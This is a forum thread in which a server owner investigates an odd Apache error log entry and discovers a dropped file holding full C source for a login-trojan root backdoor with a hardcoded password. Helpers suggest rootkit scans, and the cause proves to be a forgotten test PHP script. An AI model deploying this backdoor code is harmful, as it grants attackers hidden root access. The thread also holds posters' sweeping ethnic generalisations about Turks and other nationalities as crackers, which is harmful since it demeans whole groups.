Welcome, Guest
Please Login or Register.
Lost Password?
Virtualmin Forum English General Discussion
Re:odd msg in /var/log/httpd/error_log (1 viewing)
Post Reply

TOPIC: Re:odd msg in /var/log/httpd/error_log
#14109
ronald (User)
Posts: 415
graphgraph
odd msg in /var/log/httpd/error_log 2008/06/24 09:18  
this is what it says:

mkdir: cannot create directory `3': File exists
Quantifier follows nothing in regex; marked by <-- HERE in m/* <-- HERE
######################################################
# DefacerBackRoot
# Discovered & Coded By rUnViRuS
# # World Defacers TeaM
# WD-Geekz: rUnViRuS -PaPipiycho - n0m3rcy
# gcc backpriv8.c -o backpriv8
# Details
# It's a Simple Root Backdoor
# So, you can change:
# Details
# Time for enetering password
# Path to Demon, Trojan
# Password for Trojan
# Command Interpretator to exec
# Join with us to Get Prvi8 Exploit
# Priv8 Priv8 Priv8 Priv8
# -------- ~~~~*~~~~ --------
######################################################
*/ at r.pl line 20.


anyone has any ideas?
it is the test server which no one has access to really.
ssh is not on default port, ftp is closed. Only main server has access to it to make the backups and that goes by rsa key, not password.
  The administrator has disabled public write access.
#14111
andreychek (User)
Posts: 269
graphgraph
Re:odd msg in /var/log/httpd/error_log 2008/06/24 09:37  
That's an interesting one!

It looks like the full script might be shown here:

http://www.kasbarg.com/topic.php?topic=201679

A few questions come to mind:

* Does the file /bin/.login exist?

* If you run a find on your system, do you see a file named "backpriv8" (find / -name backpriv8)?

* What is the "r.pl" script mentioned above in the error_log?

However, you might consider running something like chkrootkit or rkhunter on your box just to be safe, that's a rather unusual error to receive :-)
-Eric
  The administrator has disabled public write access.
#14115
ronald (User)
Posts: 415
graphgraph
Re:odd msg in /var/log/httpd/error_log 2008/06/24 10:15  
hmm someone created a folder /3 in the /tmp dir...and placed a file in there.
Thats really odd as that server has no users other than me and I placed 2 of my own domains on there recently.

/tmp/3/ has a file r.pl
with
Code:

 # gcc backpriv8.c -o backpriv8
# Details
# It's a Simple Root Backdoor
# So, you can change:
# Details
# Time for enetering password
# Path to Demon, Trojan
# Password for Trojan
# Command Interpretator to exec
# Join with us to Get Prvi8 Exploit
# Priv8 Priv8 Priv8 Priv8
# -------- ~~~~*~~~~ --------
######################################################
  */
#include<signal.h>
#include<stdio.h>
#include<string.h>
#include<unistd.h>
#define REALPATH "/bin/.login"                     
#define TROJAN "/bin/login"                   
#define PASS "worlddefacers"              

char **execute;
char passwd[7];

int main(int argc, char *argv[]) {
void connection();

signal(SIGALRM,connection);
alarm(5);        
execute=argv;
*execute=TROJAN;

scanf("%s",passwd);

if(strcmp(passwd,PASS)==0) {
alarm(0);
execl("/bin/sh","/bin/sh","-i",0);   
exit(0);
}
else
{
execv(REALPATH,execute);
exit(0);
}
}


void connection()
{
execv(REALPATH,execute);


exit(0);
}


there is no /bin/.login , a /bin/login is there however. backpriv8 gives no results on a search
  The administrator has disabled public write access.
#14116
andreychek (User)
Posts: 269
graphgraph
Re:odd msg in /var/log/httpd/error_log 2008/06/24 10:22  
Hey Ronald,

Who's the owner of the r.pl file?
-Eric
  The administrator has disabled public write access.
#14117
ronald (User)
Posts: 415
graphgraph
Re:odd msg in /var/log/httpd/error_log 2008/06/24 10:26  
the owner is Apache
chkrootkit detected nothing btw. so i assume nothing bad happened (yet)
  The administrator has disabled public write access.
#14119
Joe (Admin)
Posts: 3794
graph
Re:odd msg in /var/log/httpd/error_log 2008/06/24 10:29  
This looks like an attempted (but probably failed) rootkit installation. There is definitely a security vulnerability on your system, though. Not doubt about that--random jackasses on the internet shouldn't be able to drop files onto your system (whether they escalate to root or not is another question entirely).

What are you running on your websites? (e.g. what applications?) Are they the latest versions?
  The administrator has disabled public write access.
#14122
ronald (User)
Posts: 415
graphgraph
Re:odd msg in /var/log/httpd/error_log 2008/06/24 10:43  
this is centos 5.1 with webmin and virtualmin GPL and all is latest version.
I have only two domains of my own and they both have a index.html.
also the open_basedir is locked to the ${HOME}

On 1 of the sites i have sugarcrm installed but it is "invisible" as the index.html is called before sugarcrm's index.php.

Also the 2 domains are brandnew and the sugarcrm is also (like 4 days or so). I only used that server for daily backups till recently.

anyway I tried to do a yum upgrade but a few things did go wrong and had to reboot. I have no remote access now and the filesystem is corrupted (it says RUN fsck) which I did.

Hm interesting..
Im hanging a monitor on the box and first Ill get my main servers backups off of there.
  The administrator has disabled public write access.
#14124
ronald (User)
Posts: 415
graphgraph
Re:odd msg in /var/log/httpd/error_log 2008/06/24 11:02  
right
this is (of course) my own fault.
I had a dangerous php file still on one of the domains to check for weaknesses. I forgot to take it off the server and it got indexed.

Some Turkish guys found it on the net and started toying with it.

Im just wondering why is it the Turkish are always on the first row when it comes to abusing other peoples belongings.... according to the logs there where like 5 of them messing around lol

/me deleting script..
  The administrator has disabled public write access.
#14132
Joe (Admin)
Posts: 3794
graph
Re:odd msg in /var/log/httpd/error_log 2008/06/24 12:48  
It's not just the Turks. ;-)

Romania and many former soviet states, and China all have more than their fair share of crackers. I think it's a combination of a few factors: No extradition treaty with most western nations, reasonable technology infrastructure but not a lot of jobs to go around, and a history of oppression (which tends to break cultural taboos against dishonesty, since you have to lie daily to survive in an oppressive regime--it takes a generation or so of a reasonable level of freedom to recover from that). Not than I'm defending crackers and malware producers. It's just not too surprising where they mostly originate from.
  The administrator has disabled public write access.
Post Reply
get the latest posts directly to your desktop

Learn

About
Documentation
FAQ
Compare

Talk and Get Help

Support
Forums
Bugs and Issues

See It In Action

Screenshots
Video Introduction
Demo

Get Virtualmin

OS Support
Buy Online
Download
 Copyright 2005-2007 Virtualmin, Inc. All rights reserved.